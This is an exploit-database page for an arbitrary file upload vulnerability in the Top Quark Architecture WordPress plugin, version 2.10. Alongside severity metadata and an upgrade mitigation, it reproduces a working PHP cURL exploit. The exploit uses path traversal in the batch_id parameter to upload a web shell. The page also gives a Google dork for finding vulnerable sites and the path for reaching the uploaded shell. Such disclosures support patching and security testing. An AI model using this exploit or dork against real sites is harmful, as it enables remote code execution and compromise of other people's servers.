header-logo
Suggest Exploit
vendor:
Wordpress Top Quark Architecture
by:
Adrien Thierry
8,8
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Wordpress Top Quark Architecture
Affected Version From: 2.10
Affected Version To: 2.10
Patch Exists: YES
Related CWE: N/A
CPE: a:topquark:wordpress_top_quark_architecture
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Top Quark Architecture Version 2.10 Arbitrary File Upload

An arbitrary file upload vulnerability exists in Wordpress Top Quark Architecture Version 2.10. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow the attacker to upload a malicious file to the server, which can then be used to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Wordpress Top Quark Architecture.
Source

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress Top Quark Architecture Version 2.10 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://topquark.com/
# Software Link: http://downloads.wordpress.org/plugin/topquark.zip
# Version: 2.10
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php

exploit :

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php?batch_id=../../shell.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('upload'=>"@$u"
));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

You can choose where upload the shell with param batch_id

Shell access : http://site.com/wp-content/plugins/topquark/lib/js/fancyupload/showcase/shell.php1

#####################################################################

Navigation

Suggest Exploit

Services By CQR